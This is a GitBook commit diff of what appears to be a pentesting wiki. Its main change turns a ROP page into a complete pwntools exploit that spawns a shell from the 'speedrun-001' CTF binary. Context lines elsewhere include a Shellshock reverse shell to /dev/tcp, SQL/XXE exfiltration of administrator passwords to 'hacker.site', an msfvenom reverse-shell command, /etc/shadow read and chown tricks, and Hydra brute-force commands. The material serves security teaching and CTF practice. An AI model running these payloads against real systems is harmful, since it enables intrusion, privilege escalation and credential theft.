GitBook: [master] 19 pages and 4 assets modified

SUMMARY.md

@@ -514,7 +514,7 @@
 
 * [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
   * [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
-  * [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
+  * [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
   * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
   * [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
   * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)

exploiting/linux-exploiting-basic-esp/README.md

@@ -27,12 +27,6 @@ Heap**
 
 **Stack**
 
-## **1.STACK OVERFLOWS**
-
-> buffer overflow, buffer overrun, stack overrun, stack smashing
-
-Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
-
 **Sección BSS**: Variables globales o estáticas sin inicializar
 
 ```text
@@ -51,19 +45,27 @@ int i = 5;
 
 **Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)
 
+## **1.STACK OVERFLOWS**
+
+> buffer overflow, buffer overrun, stack overrun, stack smashing
+
+Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
+
+\*\*\*\*
+
 Para obtener la dirección de una función dentro de un programa se puede hacer:
 
 ```text
 objdump -d ./PROGRAMA | grep FUNCION
 ```
 
-Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:
 
-* `unset env LINES`
-* `unset env COLUMNS`
-* `set env _=path` donde path es la ruta absoluta al programa
-* explotar el programa usando la ruta absoluta
-* asegúrate de que PWD y OLDPWD son las mismas que en gdb
+
+## ROP
+
+### Call to sys\_execve
+
+{% page-ref page="rop-syscall-execv.md" %}
 
 ## **2.SHELLCODE**
 

exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md

@@ -1,51 +1,164 @@
-# ROP - Syscall execv
+# ROP - call sys\_execve
 
-The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_
+In order to prepare the call for the **syscall** it's needed the following configuration:
 
-* **RDI**: Pointing to the string "/bin/bash"
-* **RSI**: Null
-* **RDX**: Null
-* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv**
+* `rax: 59 Specify sys_execve`
+* `rdi: ptr to "/bin/sh" specify file to execute`
+* `rsi: 0 specify no arguments passed`
+* `rdx: 0 specify no environment variables passed`
+
+So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` \(being aware of the padding needed to control the stack\).
+
+## Control the registers
+
+Let's start by finding **how to control those registers**:
+
+```c
+ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
+0x0000000000415664 : pop rax ; ret
+0x0000000000400686 : pop rdi ; ret
+0x00000000004101f3 : pop rsi ; ret
+0x00000000004498b5 : pop rdx ; ret
+```
+
+With these addresses it's possible to **write the content in the stack and load it into the registers**.
+
+## Write string
+
+### Writable memory
+
+Frist you need to find a writable place in the memory
 
 ```bash
-ROPgadget --binary vulnbinary | grep syscall
-ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop
+gef> vmmap
+[ Legend:  Code | Heap | Stack ]
+Start              End                Offset             Perm Path
+0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
+0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
+0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
 ```
 
-## Writing
+### Write String
 
-If you can somehow write to an address and then get the address of where you have written then this step is unnecessary.
+Then you need to find a way to write arbitrary content in this address
 
-Elsewhere, you may search for some **write-what-where**.  
-As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]`
-
-You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`
-
-### Finding a place to write
-
-If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.
-
-```bash
-objdump -x vulnbinary | grep ".bss" -B1
-                  CONTENTS, ALLOC, LOAD, DATA
- 23 .bss          00000010  00403418  00403418  00002418  2**3
+```python
+ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
+mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
 ```
 
-In this case: **0x403418**
+#### 32 bits
 
-### **Writing** _**"/bin/sh"**_
+```python
+'''
+Lets write "/bin/sh" to 0x6b6000
 
-```text
-buffer += address(pop_eax) # place value into EAX
-buffer += "/bin"           # 4 bytes at a time
-buffer += address(pop_edx)         # place value into edx
-buffer += address(writable_memory)
-buffer += address(writewhatwhere)
+pop rdx, 0x2f62696e2f736800
+pop rax, 0x6b6000
+mov qword ptr [rax], rdx
+'''
 
-buffer += address(pop_eax)
-buffer += "//sh"
-buffer += address(pop_edx)
-buffer += address(writable_memory + 4)
-buffer += address(writewhatwhere)
+rop += popRdx           # place value into EAX
+rop += "/bin"           # 4 bytes at a time
+rop += popRax           # place value into edx
+rop += p32(0x6b6000)    # Writable memory
+rop += writeGadget   #Address to: mov qword ptr [rax], rdx
+
+rop += popRdx
+rop += "//sh"
+rop += popRax
+rop += p32(0x6b6000 + 4)
+rop += writeGadget
 ```
 
+#### 64 bits
+
+```python
+'''
+Lets write "/bin/sh" to 0x6b6000
+
+pop rdx, 0x2f62696e2f736800
+pop rax, 0x6b6000
+mov qword ptr [rax], rdx
+'''
+rop = ''
+rop += popRdx
+rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
+rop += popRax
+rop += p64(0x6b6000) # Writable memory
+rop += writeGadget #Address to: mov qword ptr [rax], rdx
+```
+
+## Example
+
+```python
+from pwn import *
+
+target = process('./speedrun-001')
+#gdb.attach(target, gdbscript = 'b *0x400bad')
+
+# Establish our ROP Gadgets
+popRax = p64(0x415664)
+popRdi = p64(0x400686)
+popRsi = p64(0x4101f3)
+popRdx = p64(0x4498b5)
+
+# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
+writeGadget = p64(0x48d251)
+
+# Our syscall gadget
+syscall = p64(0x40129c)
+
+'''
+Here is the assembly equivalent for these blocks
+write "/bin/sh" to 0x6b6000
+
+pop rdx, 0x2f62696e2f736800
+pop rax, 0x6b6000
+mov qword ptr [rax], rdx
+'''
+rop = ''
+rop += popRdx
+rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
+rop += popRax
+rop += p64(0x6b6000)
+rop += writeGadget
+
+'''
+Prep the four registers with their arguments, and make the syscall
+
+pop rax, 0x3b
+pop rdi, 0x6b6000
+pop rsi, 0x0
+pop rdx, 0x0
+
+syscall
+'''
+
+rop += popRax
+rop += p64(0x3b)
+
+rop += popRdi
+rop += p64(0x6b6000)
+
+rop += popRsi
+rop += p64(0)
+rop += popRdx
+rop += p64(0)
+
+rop += syscall
+
+
+# Add the padding to the saved return address
+payload = "0"*0x408 + rop
+
+# Send the payload, drop to an interactive shell to use our new shell
+target.sendline(payload)
+
+target.interactive() 
+```
+
+## References
+
+* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)
+

exploiting/tools/README.md

@@ -24,7 +24,7 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
 apt-get install gdb
 ```
 
-### Parameters:
+### Parameters
 
 **-q** --&gt; No show banner  
 **-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here  
@@ -91,6 +91,32 @@ pattern search "avaaawaa" #Search for the offset of that substring
 pattern search $rsp #Search the offset given the content of $rsp
 ```
 
+### Tricks
+
+#### GDB same addresses
+
+While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
+
+* `unset env LINES`
+* `unset env COLUMNS`
+* `set env _=<path>` _Put the absolute path to the binary_
+* Exploit the binary using the same absolute route
+*  `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
+
+#### Backtrace to find functions called
+
+When you have a **statically linked binary** all the functions will belong to the binary \(and no to external libraries\). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.  
+You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** \(**backtrace**\) command to see the functions called:
+
+```text
+gef➤  bt
+#0  0x00000000004498ae in ?? ()
+#1  0x0000000000400b90 in ?? ()
+#2  0x0000000000400c1d in ?? ()
+#3  0x00000000004011a9 in ?? ()
+#4  0x0000000000400a5a in ?? ()
+```
+
 ### GDB server
 
 `gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)

linux-unix/privilege-escalation/linux-capabilities.md

@@ -744,7 +744,7 @@ And in order to read a file you could do:
 print(open("/etc/shadow", "r").read())
 ```
 
-#### Example with _\*\*_Environment \(Docker breakout\)
+#### Example with \_\*\*\_Environment \(Docker breakout\)
 
 You can check the enabled capabilities inside the docker container using:
 
@@ -1124,6 +1124,7 @@ python -c 'import os;os.chown("/etc/shadow",1000,1000)'
 ```
 
 Or with the **`ruby`** binary having this capability:
+
 ```bash
 ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
 ```

macos/macos-security-and-privilege-escalation/macos-mdm/README.md

@@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
 * Signed using the **device identity certificate \(from APNS\)**
 * **Certificate chain** includes expired **Apple iPhone Device CA**
 
-![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
+![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
 
 ### Step 6: Profile Installation
 

pentesting-web/dangling-markup-html-scriptless-injection.md

@@ -5,7 +5,7 @@
 This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.  
 It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
 
-Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
+Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
 
 ## Main Applications
 
@@ -207,8 +207,7 @@ This can be mitigated with something like: _**sandbox=’ allow-scripts allow-to
 
 ### <meta abuse
 
-You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`   
-
+You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
 
 This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
 
@@ -227,21 +226,19 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup
 
 ## Brute-Force Detection List
 
-{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %}
+{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" caption="" %}
 
 ## References
 
 All the techniques presented here and more can view reviewed with more details in:
 
-{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
+{% embed url="http://lcamtuf.coredump.cx/postxss/" caption="" %}
 
 Another HTML tags that can be abused can be find here:
 
-{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %}
+{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" caption="" %}
 
 More info:
 
-{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
-
-
+{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" caption="" %}
 

pentesting-web/file-inclusion/README.md

@@ -29,7 +29,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
 
 **Mixing several \*nix LFI lists and adding more paths I have created this one:**
 
-{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %}
+{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" caption="" %}
 
 Try also to change `/` for `\`  
 Try also to add `../../../../../`
@@ -40,7 +40,7 @@ A list that uses several techniques to find the file /etc/password \(to check if
 
 Merging several lists I have created:
 
-{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %}
+{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" caption="" %}
 
 Try also to change `/` for `\`  
 Try also to remove `C:/` and add `../../../../../`
@@ -53,7 +53,7 @@ Check the LFI list of linux.
 
 ## Basic LFI and bypasses
 
-All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
+All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\).
 
 ```text
 http://example.com/index.php?page=../../../etc/passwd
@@ -330,7 +330,7 @@ Other possible log paths:
 /var/log/httpd/error_log
 ```
 
-Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
+Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
 
 ### Via Email
 

pentesting-web/sql-injection/README.md

@@ -248,6 +248,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
 ```
 
 ### Out of band data exfiltration via XXE
+
 ```sql
 a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
 ```

pentesting/5985-5986-pentesting-winrm.md

@@ -265,7 +265,7 @@ Entry_1:
     print(s.run_ps('ipconfig'))
 
     https://book.hacktricks.xyz/pentesting/pentesting-winrm
-    
+
 Entry_2:
   Name: Hydra Brute Force
   Desctiption: Need User

pentesting/pentesting-ftp/README.md

@@ -225,7 +225,7 @@ Entry_5:
   Name: Browser Connection
   Description: Connect with Browser
   Note: ftp://anonymous:anonymous@{IP}
-  
+
 Entry_6:
   Name: Hydra Brute Force
   Description: Need Username

pentesting/pentesting-ldap.md

@@ -374,10 +374,10 @@ Entry_5:
   Name: LdapSearch Big Dump
   Description: Need Naming Context to do big dump
   Command: ldapsearch -h {IP} -x -b "{Naming_Context}"
-  
+
 Entry_6:
   Name: Hydra Brute Force
   Description: Need User
-  Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f 
+  Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
 ```
 

pentesting/pentesting-pop.md

@@ -111,7 +111,7 @@ Entry_4:
   Name: Nmap
   Description: Scan for POP info
   Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}
-  
+
 Entry_5:
   Name: Hydra Brute Force
   Description: Need User

pentesting/pentesting-smb.md

@@ -499,7 +499,7 @@ Entry_4:
   Name: Nmap Smb Scan 2
   Description: SMB Vuln Scan With Nmap (Less Specific)
   Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}
-  
+
 Entry_5:
   Name: Hydra Brute Force
   Desctiption: Need User

pentesting/pentesting-smtp/README.md

@@ -74,7 +74,7 @@ Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
 
 Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
 
-```
+```text
 220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at  Wed, 15 Sep 2021 12:13:28 +0200 
 EHLO all
 250-somedomain.com Hello [x.x.x.x]
@@ -507,7 +507,7 @@ Entry_6:
   Name: Find MX Servers
   Description: Find MX servers of an organization
   Command: dig +short mx {Domain_Name}
-  
+
 Entry_7:
   Name: Hydra Brute Force
   Description: Need Nothing

pentesting/pentesting-snmp/README.md

@@ -210,7 +210,7 @@ Entry_4:
   Name: Nmap
   Description: Nmap snmp (no brute)
   Command: nmap --script "snmp* and not snmp-brute" {IP}
-  
+
 Entry_5:
   Name: Hydra Brute Force
   Description: Need Nothing

pentesting/pentesting-ssh.md

@@ -287,3 +287,4 @@ Entry_1:
    Description: Need Username
    Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
 ```
+

pentesting/pentesting-web/README.md

@@ -373,7 +373,7 @@ Entry_10:
   Command: |
     ?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
     wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
-    
+
 Entry_11:
   Name: WordPress Hydra Brute Force
   Description: Need User (admin is default)

pentesting/pentesting-web/cgi.md

@@ -13,7 +13,7 @@ Exploiting this vulnerability the **page could throw an error**.
 
 You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
 
-#### **Test**
+### **Test**
 
 Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
 
@@ -23,7 +23,7 @@ Most tests are based in echo something and expect that that string is returned i
 nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
 ```
 
-#### **Curl \(reflected, blind and out-of-band\)**
+### **Curl \(reflected, blind and out-of-band\)**
 
 ```bash
 # Reflected
@@ -40,7 +40,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
 python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
 ```
 
-#### Exploit
+### Exploit
 
 ```bash
 #Bind Shell